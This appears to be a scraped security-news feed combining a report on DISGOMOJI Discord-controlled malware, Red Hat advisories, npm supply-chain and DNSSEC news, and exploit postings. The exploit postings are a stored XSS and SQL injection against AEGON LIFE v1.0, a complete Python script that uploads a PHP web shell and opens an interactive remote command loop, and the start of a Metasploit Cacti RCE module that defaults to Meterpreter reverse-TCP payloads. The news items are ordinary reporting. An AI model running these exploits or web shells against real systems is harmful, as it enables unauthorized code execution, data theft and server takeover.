A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.
Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.
"It is a modified version of the public project

Cyber Espionage / Malware

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.

Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.

"It is a modified version of the public project Discord-C2, which uses the messaging service Discord for command and control (C2), making use of emojis for its C2 communication," it said.

It's worth noting that DISGOMOJI is the same "all-in-one" espionage tool that BlackBerry said it discovered as part of an infrastructure analysis in connection with an attack campaign mounted by the Transparent Tribe actor, a Pakistan-nexus hacking crew

The attack chains commence with spear-phishing emails bearing a Golang ELF binary delivered within a ZIP archive file. The binary then downloads a benign lure document while also stealthily downloading the DISGOMOJI payload from a remote server.

A custom-fork of Discord-C2, DISGOMOJI is designed to capture host information and run commands received from an attacker-controlled Discord server. In an interesting twist, the commands are sent in the form of different emojis -

*   🏃‍♂️ - Execute a command on the victim's device
*   📸 - Capture a screenshot of the victim's screen
*   👇 - Upload a file from the victim's device to the channel
*   👈 - Upload a file from the victim's device to transfer\[.\]sh
*   ☝️ - Download a file to the victim's device
*   👉 - Download a file hosted on oshi\[.\]at to the victim's device
*   🔥 - Find and exfiltrate files matching the following extensions: CSV, DOC, ISO, JPG, ODP, ODS, ODT, PDF, PPT, RAR, SQL, TAR, XLS, and ZIP
*   🦊 - Gather all Mozilla Firefox profiles on the victim's device into a ZIP archive
*   💀 - Terminate the malware process on the victim's device

"The malware creates a dedicated channel for itself in the Discord server, meaning each channel in the server represents an individual victim," Volexity said. "The attacker can then interact with every victim individually using these channels."

The company said it unearthed different variations of DISGOMOJI with capabilities to establish persistence, prevent duplicate DISGOMOJI processes from running at the same time, dynamically fetch the credentials to connect to the Discord server at runtime rather than hard coding them, and deter analysis by displaying bogus informational and error messages.

UTA0137 has also been observed using legitimate and open-source tools like Nmap, Chisel, and Ligolo for network scanning and tunneling purposes, respectively, with one recent campaign also exploiting the DirtyPipe flaw (CVE-2022-0847) to achieve privilege escalation against Linux hosts.

Another post-exploitation tactic concerns the use of the Zenity utility to display a malicious dialog box that masquerades as a Firefox update in order to socially engineer users into giving up their passwords.

"The attacker successfully managed to infect a number of victims with their Golang malware, DISGOMOJI," Volexity said. "UTA0137 has improved DISGOMOJI over time."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Hackers Use DISGOMOJI Malware in Indian Government Cyber Attacks

Red Hat Security Advisory 2024-3929-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3929.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dnsmasq security updateAdvisory ID:        RHSA-2024:3929-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3929Issue date:         2024-06-13Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-3929-03

Red Hat Security Advisory 2024-3927-03 - A new container image for Red Hat Ceph Storage 7.1 is now available in the Red Hat Ecosystem Catalog.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3927.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat Ceph Storage 7.1 container image security, and bug fix update  
Advisory ID:        RHSA-2024:3927-03  
Product:            Red Hat Ceph Storage  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3927  
Issue date:         2024-06-13  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

A new container image for Red Hat Ceph Storage 7.1 is now available in the  
Red Hat Ecosystem Catalog.

Description:

Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.

This new container image is based on Red Hat Ceph Storage 7.0 and Red Hat Enterprise Linux 9.2.

Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:

https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/7.1/html/release_notes/index

All users of Red Hat Ceph Storage are advised to pull these new images from  
the Red Hat Ecosystem catalog, which provides numerous enhancements and bug  
fixes.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/7

https://access.redhat.com/articles/1548993

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/cve/CVE-2023-39325  
https://access.redhat.com/security/cve/CVE-2024-22195  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2257854  
https://bugzilla.redhat.com/show_bug.cgi?id=2268114

Red Hat Security Advisory 2024-3927-03

Red Hat Security Advisory 2024-3926-03 - An update for expat is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3926.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: expat security updateAdvisory ID:        RHSA-2024:3926-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3926Issue date:         2024-06-13Revision:           03CVE Names:          CVE-2023-52425====================================================================Summary: An update for expat is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Expat is a C library for parsing XML documents.Security Fix(es):* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)* expat: XML Entity Expansion (CVE-2024-28757)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-52425References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2262877https://bugzilla.redhat.com/show_bug.cgi?id=2268766

Red Hat Security Advisory 2024-3926-03

AEGON LIFE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599# Description:----------------A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.# Payload:----------------<script>alert(document.domain)</script># Attack Vectors:-------------------------To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.# Burp Suite Request:----------------------------POST /lims/insertClient.php HTTP/1.1Host: localhostContent-Length: 30423Cache-Control: max-age=0sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/lims/addClient.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_id"1716051159------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_password"password------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="name"<script>alert(document.domain)</script>------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"Content-Type: application/octet-streamÿØÿà

AEGON LIFE 1.0 Cross Site Scripting

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

AEGON LIFE 1.0 Remote Code Execution

AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

The recently identified threat actor uses public registries for distribution and has expanded capabilities to disrupt the software supply chain.

Source: Igor Stevanovic via Alamy Stock Photo

A newly identified North Korean threat actor has widened its distribution of malicious node package manager (npm) code to public registries. And it's differentiating itself from other state-sponsored groups as it ramps up activity to threaten the software supply chain by poisoning open source code repositories.

Moonstone Sleet first appeared on the scene late last month, when Microsoft revealed that the threat group concurrently was engaged in espionage and financial cyberattacks using a grab bag of attack techniques against aerospace, education, and software organizations and developers.

Among those techniques was to try to get hired for remote tech jobs with real companies and, in the process, spread malicious npm packages on LinkedIn and freelancer websites. Now researchers from CheckMarx have discovered that the scope of Moonstone Sleet's malicious npm package activity is wider than first reported, according to a blog post published on June 13.

The actor is "placing those malicious packages in public open source package repositories that are accessible to developers," an activity that allows the actor to expand its attack surface, Tzachi Zornstein, head of software supply chain at Checkmarx, tells Dark Reading.

"With the revelation of this new North Korean group, coupled with the recent attacks by Russian and North Korean threat actors … it has become increasingly apparent that the open-source ecosystem has become a prime target for powerful and sophisticated adversaries," Zornstein and fellow CheckMarx researcher Yehuda Gelb wrote in the post.

The researchers cite the multiyear supply chain attack that started with a backdoor implanted in the XZ Utils data compression utility to demonstrate how spreading malicious open source code can have a massive ripple effect across the security of enterprise software.

**Differentiation From Lazarus Activity**

CheckMarx also discovered how Moonstone Sleet is setting itself apart through the structure and the style of its malicious code packages from another well-known and prolific North Korean actor — Jade Sleet, better known as Lazarus — that engages in similar activity.

The newest packages published late last year and in the first quarter of 2024 show Moonstone Sleet using "a single-package approach" that executes its payload immediately upon installation, the researchers wrote.

Further, while earlier malicious payloads "included OS-specific code, executing only if it detected that it was running on a Windows machine," packages released earlier this year show the actor adding obfuscation and creating code to target Linux systems if that OS is detected by the package, the researchers revealed.

In contrast, Lazarus designed its packages, discovered in the summer of 2023, to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality. "This approach was used in an attempt to make it more challenging to detect and trace the malicious activity back to a single source," Zornstein and Gelb wrote.

The first package from Lazarus would create a directory on the victim's machine, fetch updates from a remote server, and save them in a file within the newly created directory, while the second package would execute the malicious payload.

**Evolving Threat to Open Source Ecosystem**

The tactic of publishing malicious npm packages by North Korean threat actors in general "underscores the persistent nature of their campaign" and poses a growing risk for the open source community that depends on public registries for software development.

"By uploading those malicious packages to a public registry, the attackers abuse the trust that developers have for the open source registries," Zornstein says.

However, while the open source community plays a key role in maintaining the security and integrity of the ecosystem, the primary responsibility for ensuring the safety of the software supply chain lies with the organizations that consume these packages. That's why it's imperative for organizations to "scan the code in the packages for malicious behaviors … prior to making the code available to developers," he says.

Developers and organizations also should continue to collaborate and share information among themselves and with the security community to identify and thwart these attacks, the researchers said. "Through collective effort and proactive measures," they wrote, "we can work towards a safer and more secure open-source ecosystem for all."

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

North Korea's Moonstone Sleet Widens Distribution of Malicious Code

Why the company took so long to address the issue is not known given that most other stakeholders had a fix out for the issue months ago.

Source: Robert K. Chin via Alamy Stock Photo

Among the more dangerous of the flaws for which Microsoft released a patch this week on Patch Tuesday is a denial-of-service (DoS) vulnerability publicly disclosed back in February in the Domain Name System Security Extensions (DNSSEC) protocol.

The vulnerability, identified as CVE-2023-50868 exists in a third-party DNSSEC mechanism called Next Secure Hash 3 (NSEC3) for proving that a non-existent domain truly doesn't exist, thereby protecting against malicious cataloging of signed DNS zones. The vulnerability gives attackers a way to craft DNS packets that would cause the DNS resolver to essentially exhaust its computing resources in trying to respond.

It affects several different vendors and projects, including Unbound, BIND, dnsmasq, PowerDNS, various Linux distros, and others, who released patches well before Microsoft did. A list of advisories can be found here.

**DNSSEC Resource Exhaustion Flaws**

CVE-2023-50868 is actually one of two serious DNSSEC flaws that researchers from the German National Research Center for Applied Cybersecurity ATHENE quietly informed industry stakeholders about last year.

The other is CVE-2023-50387, or "KeyTrap," a similar though more serious DNSSEC resource exhaustion bug that researchers believed would have allowed attackers to bring down large swathes of the Internet had it remained unmitigated. What made KeyTrap so dangerous is that it gave attackers a way to use a single packet to exhaust the processing capacity of a vulnerable DNS Server, essentially rendering it offline says Tom Marsland, vice president of technology at Cloud Range. "It does this by tricking those servers into performing extra calculations that overload their CPU." He estimates that some 31% of all DNS servers were vulnerable to the attack.

CVE-2023-50868 is similar in that it gives attackers a way to exhaust a DNS resolvers CPU cycles and cause it to become unresponsive.

Tyler Reguly, associate director, security R&D at Fortra says one of the biggest problems with protocol-level flaws such as CVE-2023-50868 is that they give attackers a way to tie up the server and get it to slow down or stop responding altogether.

"Once the denial-of-service slows down the DNS server's responsiveness, the amount of time that an attacker has to perform DNS cache poisoning increases drastically," he says. "What's interesting with this flaw is that the very technology designed to make DNS cache poisoning for non-existent domains harder has made cache poisoning easier for attackers."

**Microsoft's Lonely Zero-Day World**

Several major providers of DNS resolution services publicly released details of both DNSSEC flaws in a coordinated disclosure in February after they had developed mitigations for the threat. Microsoft too issued a patch for KeyTrap at the time, but waited till this week to announce a fix for CVE-2023-50868 — making the bug a zero-day threat at least from a Microsoft standpoint.

And indeed, it's somewhat surprising that Microsoft took so long to get to it, Reguly notes. He suspects one reason could be that most organizations rely on other services for external DNS, and Microsoft felt the risk associated with Microsoft's DNS resolution services wasn't all that significant.

 "We've seen vendors work together on big ticket items in the past when protocol flaws are in the mix, and it always impresses me that the vendor community is able to come together and work so well to fix these issues without any major leaks," Reguly says. "Why Microsoft dropped the ball on this CVE is unknown to me, but I'd love to see them address why it took them so much longer than the other vendors to release this fix."

Lionel Litty, chief security architect at Menlo Security, says another issue is that algorithmic complex vulnerability such as the two DNSSEC resource exhaustion flaws can be challenging to fix.

"Fixing this type of issue may require rethinking how algorithms are implemented and deciding when not to adhere to the specification because doing so would require an unreasonable amount of computation," Litty says. "It can also lead to more fundamental redesigns of how requests are prioritized by the server so that no one client can prevent others from getting their requests answered in a timely manner." In this light, it is not surprising that fixing this issue might have taken some vendors more time, he says.

**Cross-Industry Collaboration**

CVE-2023-50868 and CVE-2023-50387 are among several bugs in recent years that have forced an industry-wide response because they have existed at the protocol level or in foundational Internet technologies. The so-called Heartbleed vulnerability in the OpenSSL protocol from 2014 remains one of the most notable. But there have been others as well.

Relatively recent examples include one in the Bluetooth protocol (CVE-2023-45866), another in the UPnP Plug and Play protocol dubbed CallStranger and a vulnerability in the GTP protocol that threatened mobile networks.

Jason Soroko, senior vice president at Sectigo, sees a mixed record in the patching of such cross-vendor issues.

"While some vendors have improved their responsiveness and coordination, others have lagged behind," he says. "The coordination between different vendors and security researchers has generally improved, with more collaborative efforts to address and mitigate vulnerabilities promptly. However, the speed and efficiency of patching still vary significantly across the industry."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Microsoft, Late to the Game on Dangerous DNSSEC Zero-Day Flaw

This exploit module leverages an arbitrary file write vulnerability in Cacti versions prior to 1.2.27 to achieve remote code execution. It abuses the Import Packages feature to upload a specially crafted package that embeds a PHP file. Cacti will extract this file to an accessible location. The module finally triggers the payload to execute arbitrary PHP code in the context of the user running the web server. Authentication is needed and the account must have access to the Import Packages feature. This is granted by setting the Import Templates permission in the Template Editor section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Cacti  include Msf::Payload::Php  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti Import Packages RCE',        'Description' => %q{          This exploit module leverages an arbitrary file write vulnerability          (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It          abuses the `Import Packages` feature to upload a specially crafted          package that embeds a PHP file. Cacti will extract this file to an          accessible location. The module finally triggers the payload to execute          arbitrary PHP code in the context of the user running the web server.          Authentication is needed and the account must have access to the          `Import Packages` feature. This is granted by setting the `Import          Templates` permission in the `Template Editor` section.        },        'License' => MSF_LICENSE,        'Author' => [          'Egidio Romano', # Initial research and discovery          'Christophe De La Fuente' # Metasploit module        ],        'References' => [          [ 'URL', 'https://karmainsecurity.com/KIS-2024-04'],          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88'],          [ 'CVE', '2024-25641']        ],        'Platform' => ['unix linux win'],        'Privileged' => false,        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP',            {              'Arch' => ARCH_PHP,              'Platform' => 'php',              'Type' => :php,              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select Meterpreter by default                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ],              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select a x64 fetch payload by default.                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win',              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select a x64 fetch payload by default.                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'              }            }          ]        ],        'DisclosureDate' => '2024-05-12',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),        OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])      ]    )  end  def check    # Step 1 - Check if the target is Cacti and get the version    print_status('Checking Cacti version')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?    html = res.get_html_document    begin      cacti_version = parse_version(html)      version_msg = "The web server is running Cacti version #{cacti_version}"    rescue Msf::Exploit::Cacti::CactiNotFoundError => e      return CheckCode::Safe(e.message)    rescue Msf::Exploit::Cacti::CactiVersionNotFoundError => e      return CheckCode::Unknown(e.message)    end    if Rex::Version.new(cacti_version) < Rex::Version.new('1.2.27')      print_good(version_msg)    else      return CheckCode::Safe(version_msg)    end    # Step 2 - Login    @csrf_token = parse_csrf_token(html)    return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?    begin      do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)    rescue Msf::Exploit::Cacti::CactiError => e      return CheckCode::Unknown("Login failed: #{e}")    end    @logged_in = true    # Step 3 - Check if the user has enough permissions to reach `package_import.php`    print_status('Checking permissions to access `package_import.php`')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'package_import.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not access `package_import.php` - no response') if res.nil?    return CheckCode::Unknown("Could not access `package_import.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200    # The form with the CSRF token input field is not present when access is denied    if parse_csrf_token(res.get_html_document).empty?      return CheckCode::Safe('Could not access `package_import.php` - insufficient permissions')    end    